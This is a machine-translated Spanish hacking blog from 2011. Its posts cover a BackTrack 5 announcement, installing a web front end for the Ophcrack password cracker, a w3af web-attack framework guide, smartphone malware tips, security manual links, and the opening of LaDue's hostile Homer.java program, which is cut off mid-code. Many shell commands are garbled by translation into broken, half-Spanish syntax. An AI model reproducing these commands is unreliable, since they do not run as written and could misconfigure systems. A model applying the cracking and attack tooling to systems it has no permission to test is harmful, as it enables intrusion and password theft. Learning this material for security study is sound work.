viernes, 18 de marzo de 2011

backtrack 5 proxima salida

Saludos Mundo Libre.

Como rollos BackTrack 5 en el desarrollo a toda máquina, hemos estado recibiendo numerosas preguntas sobre la próxima versión. Pensamos que sería mejor publicar un blog con información general sobre BT5 para los impacientes. El nombre en código de esta versión será la "revolución", por un montón de razones.

BackTrack 5 se basa en Ubuntu Lucid (10.04 LTS), y (por fin) el apoyo de 32 bits y arquitecturas de 64 bits. Vamos a ser oficialmente el apoyo a KDE 4, Gnome y Fluxbox, mientras que proporciona a los usuarios racionalizar descargas la ISO de cada entorno de escritorio (DE). Herramienta de integración de nuestros repositorios se estrecha con todo nuestro apoyo DE, incluyendo la estructura DE menú específico.

Tal vez lo más importante BackTrack 5 "revolución" será nuestra primera versión que incluye el código fuente completo en él es repositorios. Esta es una gran cosa para nosotros, ya que oficialmente se nos une a la comunidad de código abierto y aclara cualquier problema de licencias que estaban presentes en BackTrack 4.

La ausencia de disponibilidad de código fuente en BT4 se debió principalmente a la falta de recursos cuando inicialmente estructurado el entorno de desarrollo BT4. Recién armados con nuestro apoyo ofensivo de Seguridad, hemos construido un * buen entorno de desarrollo *, lo que nos permite hacer algunas cosas bastante impresionante.

Nuestra lista de herramientas ha sido completamente renovado y fresco. funcionalidad Cada herramienta fue evaluado y decidido antes de la inclusión de BT5. Obviamente, estamos constantemente estar al día con interesantes nuevas herramientas y los están agregando a nuestro repositorios en su caso. Además, nuestra estructura del menú ha sido mucho más optimizado - simplificado tanto con el PTES y normas OSSTMM. Esto hará que encontrar y utilizar las herramientas adecuadas mucho más fácil.

Por fin estamos capaz de actualizar nuestro plan de trabajo y de precisar una fecha para el lanzamiento - 10 de mayo de 2011. Si usted tiene una solicitud de herramienta para una herramienta que no existe en BackTrack, por favor, utilice este formulario para solicitarlo. Este formulario estará activo durante 4 semanas.
BackTrack cinco sugerencias de herramientas
Si usted tiene una idea para una nueva herramienta que le falta en BackTrack, esta es tu oportunidad de ser escuchado!



http://www.backtrack-linux.org/backtrack/backtrack-5-release-tool-suggestions/

Traduccion Dellcom1a.

Fuente: http://www.backtrack-linux.org/backtrack/backtrack-5-release-tool-suggestions/

Saludos Mundo libre.

Wophcrack

Saludos Mundo libre.

He aqui una aplicacion Wophcrack Interfaz basada en Web Por Contraseña Ophcrack Herramienta Cracking .

Estoy asumiendo que la lectura de todo el mundo ya sabe de Ophcrack - el impresionante tiempo / memoria galleta de la contraseña de compensación.

Bueno, aquí es una ingeniosa interfaz basada en web para ello. Tablas del arco iris son muy útiles cuando se agrieta los hashes de contraseñas, pero una gran desventaja de estas tablas es su tamaño que puede ser de cientos de conciertos de tablas complejas. El autor pensó que sería muy útil disponer de una interfaz web personal para las tablas del arco iris que se puede acceder desde cualquier lugar en la web en cualquier lugar sin tener que llevar a las tablas de gran tamaño con usted dondequiera que vayas. Y bueno aquí estamos, Wophcrack (Web) Ophcrack.

Wophcrack - Interfaz Web para Ophcrack

Cuando grietas LM o NTLM hashes Ophcrack es una gran herramienta como vimos hace poco, se proporciona una GUI y CLI opciones, junto con algunas tablas gratuitos y de pago. El autor escribió básicamente una interfaz PHP rápido y sucio basado en la web de Ophcrack.

Wophcrack fue diseñado para trabajar en retroceso 4 R2, A pesar de que se puede instalar en cualquier distribución de Linux con algunos pequeños ajustes, Wophcrack también puede fácilmente modificados con el apoyo del arco iris Crack.

tablas del arco iris son muy útiles cuando se agrieta los hashes de contraseñas, Una desventaja de estas tablas es su tamaño que puede llegar a decenas e incluso cientos de conciertos.
Me gustó mucho la seguridad ofensiva chiflado galleta de hachís en línea y pensé que sería muy bueno tener una interfaz web para mis tablas del arco iris que puedo acceder desde Internet en cualquier lugar sin tener que llevar conmigo siempre que lo necesite.

Cuando lm grietas / NTLM hashes me encanta usar Ophcrack que proporciona una interfaz gráfica de usuario y el software libre de la CLI, junto con algunas tablas gratuitos y de pago.

Me escribió una interfaz basada en web, rápida y sucia para PHP llamado Ophcrack Wophcrack, debo decir que no soy un programador y estoy seguro de que esto se podría hacer más eficiente y elegante, de todos modos ... su trabajo muy bien:), pensé que tal vez alguien se encuentra útil, así que decidí compartirlo aquí.

Wophcrack fue diseñado para trabajar en retroceso 4 R2, A pesar de que se puede instalar en cualquier distribución de Linux con algunos pequeños ajustes, Wophcrack También puede editar fácilmente para apoyar crack del arco iris.
Por favor, lea los requisitos y las notas de instalación antes de usar Wophcrack.
Wophcrack requerirá algunos ajustes en el código manual a la habitación que el medio ambiente.
Wophcrack instalación Backtrack
1. Descargar e instalar ophcrack-cli
Backtrack no incluye ophcrack-cli por defecto, tendrá que descargar e instalar de forma manual
Obtener ophcrack-cli AQUI

root @ Blackbox: ~ / OphcrackWeb # dpkg-i-ophcrack cli_3.3.0-1_i386.deb

2. Configurar el cron
Dar el usuario www-data (apache) permisos para utilizar cron

root @ Blackbox: ~ # echo> www-data / etc / cron.allow

Inicio automático al iniciar el servicio cron

root @ Blackbox: ~ # por defecto de cron update-rc.d

Iniciar el servicio cron

root @ Blackbox: ~ # / etc / init.d / cron inicio

3. Crear e importar la base de datos
Crear la base de datos

root @ Blackbox: ~ # mysql-u root-p

Palabra clave:

Bienvenido al monitor de MySQL. final comandos con, o \ g.

Su ID de conexión MySQL es de 34

Versión del servidor: 5.0.67-0ubuntu6 (Ubuntu)

'Ayuda;' o '\ h' para obtener ayuda. Tipo '\ c' para borrar el buffer.

mysql> CREATE DATABASE galleta;

Query OK, 1 fila afectada (0,04 segundos)

Importación de datos de SQL Wophcrack

root @ Blackbox: / var / www # mysql-u root-p


Auto iniciar el servicio MySQL en el arranque

root @ Blackbox: ~ # por defecto mysql update-rc.d

Inicie el servicio de mysql

root @ Blackbox: ~ # / etc / init.d / mysql start

4. Configurar el correo notificaciones
asegúrese de que su DNS está correctamente configurado en / etc / resolv.conf
editar "/ etc / hosts" y agregar en la parte superior de la línea siguiente con su dirección IP, nombre de host y el nombre de dominio.
su-eth-ip host hostname.domain.com
Inicio automático de sendmail servicio en el arranque

root @ Blackbox: ~ # sendmail por defecto de update-rc.d

reiniciar el servicio sendmail

root @ Blackbox: ~ # / etc / init.d / sendmail reiniciar

También tendrá que editar Wophcrack "rc.sh" archivo con su dirección de correo electrónico y la línea de dominio 8:

sendEmail-f "resultado control" cracker@domain.com-u-t $
5. Configurar apache
Inicio automático del servicio de Apache en el arranque

root @ Blackbox: ~ # update-rc.d apache2 por defecto

Inicie el servicio apache

root @ Blackbox: ~ # / etc / init.d / apache

6. Edición de archivos Wophcrack
Wophcrack está diseñado para trabajar desde el directorio "/ var / www carpeta" en caso de que quiera para moverlos a otro dolder tendrá que hacer algunos cambios
Wophcrack asumirá que su arco iris mesas ophcrack directorio se encuentra en "/ pentest / RainbowTables" y cada uno de los archivos de la tabla se encuentra en una subcarpeta con los siguientes nombres:
tables_vista_free
tables_xp_free_fast
tables_xp_free_small
Vista_special
XP_special
En caso de que quiere poner las tablas en un directorio diferente que tendrá que editar los siguientes archivos:
index.php inicio de la línea 60:

Manual Linux

Saludos Mundo Libre.

Pongo a su disposicion un exelente manual de linux creado por Zonasiete.org que lastima que ya no tiene una actualizacion mas reciente ya que la ultima fue la del 2004 pero no por eso deja deser un exelente manual para aquellos que apanas se inician en el maravilloso mundo de linux.

El pdf de este manual se encuantra en nuestro yahoo group.

Este manual esta dirigido a usuarios novatos para la integracion de linux como su sistema operativo bace.


direccion de descarga http://mx.groups.yahoo.com/group/escuelahackerpuebla
Saludos Mundo libre.

jueves, 17 de marzo de 2011

Server+ bible

Saludos Mundo Libre.

Buscando informacion en mis cds de tecnicas de hackeo me he encontrado un pdf muy especial para aquellos que estan en la carrera de ing en informatica o aquellos curiosos del hacking un libro en pdf que se titula Server Plus Bible no necesita traduccion ya que es la biblia de los servidores.

Aqui podras conocer como echar andar un servidor desde cero con todos sus arreglos es un exelente libro que me he encontrado.

El libro lo podran descargar de nuestro yahoogroup que esta en este link.

http://mx.groups.yahoo.com/group/escuelahackerenpuebla/

Ai podran descargar este libro espero les sirva de algo como ami me sirvio mucho y a muchos amigos.

Saludos mundo libre

miércoles, 16 de marzo de 2011

Malware en smartphones

Saludos Mundo Libre.

Los estudios realizados sobre el fraude online indican cada vez con mayor claridad que los smartphones se han convertido en un nuevo objetivo de las mafias que realizan este tipo de fraude.


Actualmente tenemos a nuestra disposición teléfonos con una gran cantidad de funcionalidades que nos permiten hacer muchísimas cosas sin necesidad de un ordenador. Todas las operaciones realizadas a través del smartphone requieren del uso de datos personales, claves de acceso y datos confidenciales. Para rizar el rizo, tenemos a nuestra disposición una serie de tarifas de conexión que nos garantizan una conectividad casi permanente con Internet.


El principal problema que encontramos es la escasa concienciación de los usuarios de utilizar los datos mencionados de una forma segura.


Viendo el éxito y uso de las tecnologías, no es de extrañar que haya aparecido malware que aproveche puntos débiles de las mismas, con el objetivo de obtener información del usuario.


El primer malware destinado a smartphones apareció en 2004. No era especialmente elaborado, pero marcó el comienzo de lo que sería una constante evolución de estos programas maliciosos.


Hoy en día nos podemos encontrar con malware elaborado, como es “Zeus Man in The Mobile”.


Zeus es uno de los troyanos bancarios más populares. La aplicación infecta el móvil para robar los SMS que envían las entidades bancarias para confirmar las transferencias, además de recibir otras órdenes por parte del atacante.


Hace ya tiempo que se comentaba que los dispositivos móviles serían objeto de esta clase de amenazas, y ha sido en 2010 donde se ha notado un crecimiento significativo. Este crecimiento no se detendrá en 2011 , por lo que habrá que aumentar la precaución a la hora de utilizar estos dispositivos.


Los usuarios deben de ser conscientes de los riesgos que corren, y de qué medidas existen para evitarlos.
CNCCS ha elaborado una guía de buenas prácticas que describe cómo proteger los smartphones.


Se detalla a continuación:


• Habilitar medidas de acceso al dispositivo como el PIN o contraseña si está disponible.
• Configurar el smartphone para su bloqueo automático pasados unos minutos de inactividad.
• Antes de instalar una nueva aplicación revisar su reputación. Sólo instalar aplicaciones que provengan de fuentes de confianza.
• Prestar atención a los permisos solicitados por las aplicaciones y servicios a instalar.
• Mantener el software actualizado, tanto el Sistema Operativo como las aplicaciones.
• Deshabilitar características mientras no se usen: Bluetooth, infrarrojos o Wi-fi.
• Configurar el Bluetooth como oculto y con necesidad de contraseña.
• Realizar copias de seguridad periódicas.
• Cifrar la información sensible cuando sea posible.
• Utilizar software de cifrado para llamadas y SMS.
• Siempre que sea posible no almacenar información sensible en el smartphone, asegurándose que no se cachea en local.
• Al deshacerse del smartphone borrar toda la información contenida en el smartphone.
• En caso de robo o pérdida del smartphone informar al proveedor de servicios aportando el IMEI del dispositivo para proceder a su bloqueo.
• En determinados casos pueden utilizarse opciones de borrado remoto o automático (después de varios intentos de acceso fallidos).
• Monitorizar el uso de recursos en el smartphone para detectar anomalías.
• Revisar facturas para detectar posibles usos fraudulentos.
• Mantener una actitud de concienciación en el correcto uso de estos dispositivos y los riesgos asociados.
• Extremar la precaución al abrir un correo, un adjunto de un SMS o hacer click en un enlace. Cabe destacar que esta fue una de las vías de entrada del Zeus-Mitmo.
• Desconfiar de los archivos, enlaces o números que vengan en correos o SMS no solicitados.
• Evitar el uso de redes Wi-fi que no ofrezcan confianza.
• Tener en cuenta este tipo de dispositivos en su política de seguridad corporativa.

Fuente guía de Buenas prácticas SmartPhones:
http://www.cnccs.es
José Francisco Lendínez Echeverría.

w3af segunda entrega

Saludos Mundo Libre.

Seguimos con nuestra segunda entrega de esta exelente aplicacion.

Todos los menús de configuración de proporcionar los siguientes comandos:
● ayuda
● Vista
● conjunto
● vuelta

Aquí es un ejemplo del uso de estos comandos en el menú de configuración-http:

w3af/config:httpsettings>>> help

| view | List the available options and their values. |
| set | Set a parameter value. |

| back | Go to the previous menu. |
| exit | Exit w3af. |
| assert | Check assertion. |

w3af/config:httpsettings>>> view

| Setting | Value | Description |

| timeout | 10 | The |
| | | timeout |
| | | for |
| | | connections |
| | | to the |
| | | HTTP |
| | | server |
| headersFile | | Set the |
| | | headers |
| | | filename. |
| | | This |
| | | file |
| | | has |
| | | additional |
| | | headers |
| | | that |
| | | are |
| | | added |
| | | to each |
| | | request. |

| ignoreSessCookies | False | Ignore |
| | | session |
| | | cookies |
| cookieJarFile | | Set the |
| | | cookiejar |
| | | filename. |

w3af/config:httpsettings>>> set timeout 5
w3af/config:httpsettings>>> view

| timeout | 5 | The |

En resumen, la "visión" comando se utiliza para listar todos los parámetros configurables,
con sus valores y una descripción. El conjunto de comandos se utiliza para cambiar un valor.
Finalmente, se puede ejecutar "de vuelta", "." o presione CTRL + C para volver a la anterior
menú. Una ayuda detallada de todos los parámetros de configuración se pueden obtener con
"ayudar a los parámetros", como se muestra en este ejemplo:

w3af/config:httpsettings>>> help timeout
Help for parameter timeout:
===========================
Set low timeouts for LAN use and high timeouts for slow Internet
connections.
w3af/config:httpsettings>>>

La "http-configuración"y la "configuración misc" menús de configuración se utilizan para establecer parámetros de todo el sistema que se utilizan en el marco.

Todos los parámetros han incumplimientos y en la mayoría de los casos usted puede dejarlos como están.

w3af fue diseñado en de manera que permite a los principiantes para ejecutarlo sin tener que aprender mucho de su funcionamiento interno.

También es lo suficientemente flexible como para ser puesto a punto por expertos que saben lo que quieren y necesario cambiar los parámetros de configuración interna para cumplir con sus tareas.

W3af Correr con interfaz de usuario GTK

El marco también tiene una interfaz gráfica de usuario que usted puede comenzar
ejecución:

$ ./w3af_gui

La interfaz gráfica de usuario le permite realizar todas las acciones que la
marco de las ofertas y las características de una manera mucho más fácil y más rápido para iniciar una exploración y analizar los resultados.

En caso de que usted se está preguntando lo que la interfaz gráfica de usuario se parece, aquí hay un captura de pantalla:





Para más información, por favor, lea las "gtkUiUsersGuide".

Saludos Mundo libre.

martes, 15 de marzo de 2011

Aplicacion w3af

Saludos Mundo Libre.

Hoy quiero platicar de una exelente aplicacion en linux para Auditar o Atacar un sitio web.

Introducción

Este documento es una guía de usuario para el ataque de aplicaciones Web y Auditoría
Marco (w3af), su objetivo es proporcionar una visión general básica de lo que el marco
es decir, cómo funciona y qué puede hacer con ella.

w3af es un entorno completo de la auditoría y atacar aplicaciones web. Este
medio ambiente proporciona una plataforma sólida para la auditoría y pruebas de penetración.

Lo podemos Descargar desde su web.

El marco puede ser descargado desde la página principal del proyecto:
http://w3af.sf.net/ # download

Hay dos formas de instalar w3af: a partir de un paquete de liberación (de configuración para w3af
Windows y el paquete tgz para los sistemas basados ​​en Unix) o desde el SVN. Primera vez que los usuarios debe utilizar el último paquete, mientras que los usuarios más avanzados deben realizar una SVN pago para obtener la última versión del marco.

Instalación

El marco debería funcionar en todas las plataformas soportadas por Python. w3af ha sido
probado en Linux, Windows XP, Windows Vista y OpenBSD.

Esta guía de usuario guiará a través de la instalación en una plataforma Linux. w3af la instalación en un Cuadro de Windows es muy sencillo si se utiliza el programa de instalación disponibles que pueden ser descargado desde el sitio oficial de w3af.

Requisitos de instalación

Los paquetes necesarios para ejecutar w3af se puede dividir en dos grupos:

● básica necesaria:

- Python 2.5
- fpconst-0.7.2
- NLTK
- SOAPpy
- pyPdf
- Enlaces de Python para la biblioteca libxml2
- Python OpenSSL
- json.py
- scapy
- pysvn

● requisitos de interfaz de usuario gráfica:

- sqlite3 python
- graphviz
- PyGTK 2.0
- gtk 2.12

Como habrás adivinado, los requisitos básicos necesarios para ejecutar con w3af
cualquier interfaz de usuario (consola o gráfico), y la interfaz gráfica de usuario
requisitos son necesarios sólo si va a utilizar la interfaz de usuario GTK +.

Algunos de los requisitos se incluyen con el archivo de distribución, a fin de que
el proceso de instalación sea más fácil para el usuario principiante.

Los requisitos de empaquetado se encuentran dentro del directorio extlib.

La mayoría de las bibliotecas se pueden ejecutar directamente, pero otros requieren un proceso de instalación, los pasos de instalación de estas bibliotecas son (como usuario root):

cd w3af
cd extlib
cd fpconst0.7.2
python setup.py install
cd ..
cd SOAP.py
python setup.py install
cd ..
cd pyPdf
python setup.py install

Actualización automática

El marco también incluye una función de actualización automática.

Esta característica le permite ejecutar la última versión SVN sin preocuparse por la ejecución del "svn update" de comandos o incluso tener un cliente de SVN.

Puede configurar la instancia w3af locales que lo haga por usted una vez al día, semanal o mensual.

La función de actualización automática está activada por defecto y su configuración se puede
cambiar con el "startup.conf" archivo que se guarda (~ / .w3af/startup.conf)
después de la carrera w3af primero. El archivo startup.conf se parece a esto:

[STARTUP_CONFIG]
lastupdate
= 20110124
# Valid values: D[aily], W[eekly], [M]onthly
frequency = D
autoupdate = true

Dependiendo de esta configuración w3af sabrá cuándo realizar la próxima actualización
verificación.

Sin embargo usted es capaz de forzar la actualización a tener lugar, o no,
simplemente dando la secuencia de comandos de inicio de la opción deseada:

forceupdate o-noupdate.

Esta es la típica salida de la consola cuando el proceso de actualización automática se realiza.

$ ./w3af_console f
Checking if a new version is available in our SVN repository.
Please wait...
Your current w3af installation is r14. Do you want to update to
r16 [y/N]? y
w3af is updating from the official SVN server...
NEW /home/w3af/spam/eggs/__init__.py
UPD /home/w3af/spam/eggs/vulnerability.py
At revision 16.
Do you want to see a summary of the new code commits log
messages? [y/N]? y
Revision 16:
1. Rem new dependency
2. Added new dependency
3. Dep change

w3af>>>

A veces puede ocurrir que la última actualización tiene algo que no puede
ser feliz. w3af da la opción de volver a la última versión de trabajo local
para esos casos. Puede hacerlo simplemente usando la "r"
o "revisión" opción junto con el argumento ANTERIOR:

$ ./w3af_console r PREV # Update code to PREVious local rev.

Constantemente también puedes hacer lo siguiente:

$ ./w3af_console r HEAD

Lo que equivale a forzar la actualización a la última revisión con el mencionado
"f" opción.

Por último, también puede forzar la actualización a una revisión específica:

$ ./w3af_console r 1234

fases w3af

Antes de ejecutar w3af un usuario debe saber cómo la aplicación se divide y cómo
plugins van a ser ejecutados.

El marco tiene tres tipos de plugins: descubrimiento, la auditoría y el ataque.

Plugins Discovery sólo tienen una responsabilidad, encontrar nuevas URLs, formularios y otros
"puntos de inyección".

Un ejemplo clásico de un descubrimiento plugin es una tela de araña.

Este plugin tiene una dirección URL como entrada y devuelve uno o más puntos de inyección.

Cuando un usuario permite más de un plugin de este tipo, que trabajan en un bucle: Si un plugin encuentra un nueva dirección URL en la primera carrera, el núcleo w3af enviará a esa dirección URL plugin B. Si B plugin a continuación, busca una nueva dirección URL, será enviado al plugin A.

Este proceso continuará hasta que todos los plugins se ejecutan y no conocen más acerca de la aplicación se puede encontrar con el descubrimiento permitió plugins.

Plugins de Auditoría tomar los puntos de inyección que han encontrado los plugins descubrimiento y enviar especialmente diseñado de datos a todos ellos con el fin de encontrar vulnerabilidades.

Un clásico ejemplo de una auditoría es un plugin que busca vulnerabilidades de inyección SQL.
Ataque plugins objetivo es explotar las vulnerabilidades encontradas por los plugins de auditoría.

Ellos normalmente devuelven un shell en el servidor remoto, o un volcado de tablas remotas en el
caso de las inyecciones SQL hazañas.

Running w3af

w3af tiene dos interfaces de usuario, la interfaz de usuario de la consola (consoleUI) y el
interfaz gráfica de usuario (gtkUi). Esta guía del usuario se centrará en la consoleUI, que
ismore probado y completo que el gtkUi. Para arrancar el que sólo consoleUI
tiene que ejecutar w3af sin parámetros y obtendrá un mensaje como este:

$ ./w3af_console
w3af>>>

A partir de este sistema usted podrá configurar el marco, los análisis de lanzamiento y
en última instancia explotar una vulnerabilidad. En este sistema se puede empezar a teclear comandos.

El primer comando que tienes que aprender es "ayudar" (por favor, tenga en cuenta que los comandos se entre mayúsculas y minúsculas):

w3af>>> help
||
| start | Start the scan. |
| plugins | Enable and configure plugins. |
| exploit | Exploit the vulnerability. |
| profiles | List and use scan profiles. |
| httpsettings
| Configure the http settings of the |
| | framework. |
| miscsettings
| Configure w3af misc settings. |
| target | Configure the target URL. |

| back | Go to the previous menu. |
| exit | Exit w3af. |
| assert | Check assertion. |

| help | Display help. issuing: help [command]|
| | , prints more specific help about |
| | "command" |
| version | Show w3af version information. |
| keys | Display key shortcuts. |

w3af>>>
w3af>>> help target
Configure the target URL.
w3af>>>

Los comandos del menú principal se explica en la ayuda que se muestra arriba. La
internos de cada menú se verá más adelante en este documento.

Como ya cuenta, el comando "help" puede tomar un parámetro, y, si se dispone de una detallada
ayuda para que el parámetro se muestra, por ejemplo, "ayudar a las teclas".

Otras cosas interesantes que aviso sobre la consoleUI es la capacidad de pestañas
finalización (tipo 'pluralismo' y luego TAB) y el historial de comandos (después de escribir algunos comandos, navegar por la historia con la flechas arriba y abajo).

Para entrar en un menú de configuración, sólo tienes que escribir su nombre y pulsa enter, que
a ver cómo los cambios del sistema y que ahora está en ese contexto:

w3af>>>httpsettings
w3af/config:httpsettings>>>


Continuara.

Saludos Mundo Libre.

Linux

Saludos Mundo Libre.

He aqui una extensa explicacion sobre Seguridad en Unix y Redes proporcionadas por

http://mmc.geofisica.unam.mx/LuCAS/Manuales-LuCAS/doc-unixsec/unixsec-html/

Exelente servidor asi que podran pasar un buen rato aprendiendo del mejor sistema que hay asi que a empezar a leer.

Fue Creado por Antonio Villalón Huerta en el ano de Julio, 2002. actualizado el 2003-08-08 .

SEGURIDAD EN UNIX Y REDES



Versión 2.1

Antonio Villalón Huerta

Julio, 2002
$\textstyle \parbox{4in}{ \vspace{8cm} \it Copyright \copyright\ 2000,2002 Anton... ...license is included in the section entitled \lq GNU Free Documentation License'.}$

* Índice General
* Índice de Figuras
* Índice de Tablas
o Notas del autor
o Introducción y conceptos previos
+ Introducción
+ Justificación y objetivos
+ >Qué es seguridad?
+ >Qué queremos proteger?
+ >De qué nos queremos proteger?
# Personas
# Amenazas lógicas
# Catástrofes
+ >Cómo nos podemos proteger?
+ Redes `normales'
# Redes de I+D
# Empresas
# ISPs
+ >Seguridad en Unix?

* Seguridad del entorno de operaciones
o Seguridad física de los sistemas
+ Introducción
+ Protección del hardware
# Acceso físico
# Desastres naturales
# Desastres del entorno
+ Protección de los datos
# Eavesdropping
# Backups
# Otros elementos
+ Radiaciones electromagnéticas
o Administradores, usuarios y personal
+ Introducción
+ Ataques potenciales
# Ingeniería social
# Shoulder Surfing
# Masquerading
# Basureo
# Actos delictivos
+ >Qué hacer ante estos problemas?
+ El atacante interno

* Seguridad del sistema
o El sistema de ficheros
+ Introducción
+ Sistemas de ficheros
+ Permisos de un archivo
+ Los bits SUID, SGID y sticky
+ Atributos de un archivo
+ Listas de control de acceso: ACLs
+ Recuperación de datos
+ Almacenamiento seguro
# La orden crypt(1)
# PGP: Pretty Good Privacy
# TCFS: Transparent Cryptographic File System
# Otros métodos de almacenamiento seguro
o Programas seguros, inseguros y nocivos
+ Introducción
+ La base fiable de cómputo
+ Errores en los programas
# Buffer overflows
# Condiciones de carrera
+ Fauna y otras amenazas
# Virus
# Gusanos
# Conejos
# Caballos de Troya
# Applets hostiles
# Bombas lógicas
# Canales ocultos
# Puertas traseras
# Superzapping
# Programas salami
+ Programación segura
o Auditoría del sistema
+ Introducción
+ El sistema de log en Unix
+ El demonio syslogd
+ Algunos archivos de log
# syslog
# messages
# wtmp
# utmp
# lastlog
# faillog
# loginlog
# btmp
# sulog
# debug
+ Logs remotos
+ Registros físicos
o Copias de seguridad
+ Introducción
+ Dispositivos de almacenamiento
+ Algunas órdenes para realizar copias de seguridad
# dump/restore
# La orden tar
# La orden cpio
# Backups sobre CD-ROM
+ Políticas de copias de seguridad
o Autenticación de usuarios
+ Introducción y conceptos básicos
+ Sistemas basados en algo conocido: contraseñas
+ Sistemas basados en algo poseído: tarjetas inteligentes
+ Sistemas de autenticación biométrica
# Verificación de voz
# Verificación de escritura
# Verificación de huellas
# Verificación de patrones oculares
# Verificación de la geometría de la mano
+ Autenticación de usuarios en Unix
# Autenticación clásica
# Mejora de la seguridad
+ PAM

* Algunos sistemas Unix
o Solaris
+ Introducción
+ Seguridad física en SPARC
+ Servicios de red
+ Usuarios y accesos al sistema
+ El sistema de parcheado
+ Extensiones de la seguridad
# ASET
# JASS
# sfpDB
+ El subsistema de red
+ Parámetros del núcleo
o Linux
+ Introducción
+ Seguridad física en x86
+ Usuarios y accesos al sistema
+ El sistema de parcheado
+ El subsistema de red
+ El núcleo de Linux
# Opciones de compilación
# Dispositivos
# Algunas mejoras de la seguridad
o AIX
+ Introducción
+ Seguridad física en RS/6000
+ Servicios de red
+ Usuarios y accesos al sistema
# El fichero /etc/security/.ids
# El fichero /etc/security/passwd
# El fichero /etc/security/failedlogin
# El fichero /etc/security/lastlog
# El fichero /etc/security/limits
# El fichero /etc/security/login.cfg
# El fichero /etc/security/user
# El fichero /etc/security/group
+ El sistema de log
+ El sistema de parcheado
+ Extensiones de la seguridad: filtros IP
+ El subsistema de red
o HP-UX
+ Introducción
+ Seguridad física en PA-RISC
+ Usuarios y accesos al sistema
+ El sistema de parcheado
+ Extensiones de la seguridad
# Product Description Files
# inetd.sec(4)
+ El subsistema de red
+ El núcleo de HP-UX

* Seguridad de la subred
o El sistema de red
+ Introducción
+ Algunos ficheros importantes
# El fichero /etc/hosts
# El archivo /etc/ethers
# El fichero /etc/networks
# El fichero /etc/services
# El fichero /etc/protocols
# El fichero /etc/hosts.equiv
# El fichero .netrc
# El fichero /etc/inetd.conf
+ Algunas órdenes importantes
# La orden ifconfig
# La orden route
# La orden netstat
# La orden ping
# La orden traceroute
+ Servicios
o Algunos servicios y protocolos
+ Introducción
+ Servicios básicos de red
# systat
# daytime
# netstat
# chargen
# tftp
# finger
# POP
# auth
# NNTP
# NTP
# UUCP
+ El servicio FTP
# FTP anónimo
# FTP invitado
+ El servicio TELNET
+ El servicio SMTP
+ Servidores WWW
+ Los servicios r-
+ X­Window
# Autenticación por máquina
# Autenticación por testigo
o Cortafuegos: Conceptos teóricos
+ Introducción
+ Características de diseño
+ Componentes de un cortafuegos
# Filtrado de paquetes
# Proxy de aplicación
# Monitorización de la actividad
+ Arquitecturas de cortafuegos
# Cortafuegos de filtrado de paquetes
# Dual-Homed Host
# Screened Host
# Screened Subnet (DMZ)
# Otras arquitecturas
o Cortafuegos: Casos de estudio
+ Firewall-1
# Introducción
# Arquitectura
# Instalación
# Gestión
# El sistema de log
# INSPECT
+ ipfwadm/ipchains/iptables
# Introducción
# Arquitectura
# Gestión
# El sistema de log
+ IPFilter
# Introducción
# Instalación
# Gestión
# El sistema de log
+ PIX Firewall
# Introducción
# La primera sesión con PIX Firewall
# Interfaces de red
# Accesos entre interfaces
# Listas de control de acceso
# Rutado
# Otras órdenes útiles
# El sistema de log remoto
# Failover
o Ataques remotos
+ Escaneos de puertos
+ Spoofing
+ Negaciones de servicio
+ Interceptación
+ Ataques a aplicaciones
# Correo electrónico
# Ataques vía web
o Sistemas de detección de intrusos
+ Introducción
+ Clasificación de los IDSes
+ Requisitos de un IDS
+ IDSes basados en máquina
+ IDSes basados en red
+ Detección de anomalías
+ Detección de usos indebidos
+ Implementación real de un IDS
# IDS en el cortafuegos
# IDS en la red: SNORT
# IDS en la máquina
# Estrategias de respuesta
# Ampliación del esquema
+ Algunas reflexiones
o Kerberos
+ Introducción
+ Arquitectura de Kerberos
+ Autenticación
# Login
# Obtención de tickets
# Petición de servicio
+ Problemas de Kerberos

* Otros aspectos de la seguridad
o Criptología
+ Introducción
+ Criptosistemas
+ Clasificación de los criptosistemas
# Criptosistemas de clave secreta
# Criptosistemas de clave pública
+ Criptoanálisis
+ Criptografía clásica
# El sistema Caesar
# El criptosistema de Vigènere
+ Un criptosistema de clave secreta: DES
+ Criptosistemas de clave pública
# El criptosistema RSA
# El criptosistema de ElGamal
# Criptosistema de McEliece
+ Funciones resumen
+ Esteganografía
o Algunas herramientas de seguridad
+ Introducción
+ Titan
+ TCP Wrappers
+ SSH
+ Tripwire
+ Nessus
+ Crack
o Gestión de la seguridad
+ Introducción
+ Políticas de seguridad
+ Análisis de riesgos
# Identificación de recursos
# Identificación de amenazas
# Medidas de protección
+ Estrategias de respuesta
+ Outsourcing
+ El `Área de Seguridad'

* Apéndices
o Seguridad básica para administradores
+ Introducción
+ Prevención
+ Detección
+ Recuperación
+ Recomendaciones de seguridad para los usuarios
+ Referencias rápidas
# Prevención
# Detección
# Recuperación
# Usuarios
o Normativa
+ Nuevo Código Penal
+ Reglamento de Seguridad de la LORTAD
+ Ley Orgánica de Protección de Datos
o Recursos de interés en INet
+ Publicaciones periódicas
+ Organizaciones
# Profesionales
# Gubernamentales/militares
# Universidades/educación
+ Criptografía
+ Seguridad general
+ Compañías y grupos de desarrollo
# Unix
# General
+ Sitios underground
# Grupos
# Exploits y vulnerabilidades
+ Recursos en España
+ Listas de correo
+ Grupos de noticias
# Criptología
# Unix
# Redes
# Misc
o Glosario de términos anglosajones
o Conclusiones

* Bibliografía
o GNU Free Documentation License
+ Preamble
+ Applicability and Definitions
+ Verbatim Copying
+ Copying in Quantity
+ Modifications
+ Combining Documents
+ Collections of Documents
+ Aggregation With Independent Works
+ Translation
+ Termination
+ Future Revisions of This License
+ ADDENDUM: How to use this License for your documents

* Sobre este documento...

Disfrutenlo saludos y gracias al autor por este exelente manual.

Suludos Mundo Libre.

lunes, 14 de marzo de 2011

Applets Hostiles

Saludos Mundo libre.

Applets hostiles

En los últimos años, con la proliferación de la web, Java y Javascript, una nueva forma de malware se ha hecho popular. Se trata de los denominados applets hostiles, applets que al ser descargados intentan monopolizar o explotar los recursos del sistema de una forma inapropiada ([MF96]); esto incluye desde ataques clásicos como negaciones de servicio o ejecución remota de programas en la máquina cliente hasta amenazas mucho más elaboradas, como difusión de virus, ruptura lógica de cortafuegos o utilización de recursos remotos para grandes cálculos científicos.

Como ejemplo de applet hostil - aunque este en concreto no es muy peligroso - tenemos el siguiente código, obra de Mark D. LaDue (1996):

anita:~/Security# cat Homer.java
import java.io.*;

class Homer {
public static void main (String[] argv) {
try {
String userHome = System.getProperty("user.home");
String target = "$HOME";
FileOutputStream outer = new
FileOutputStream(userHome + "/.homer.sh");
String homer = "#!/bin/sh" + "\n" + "#-_" + "\n" +
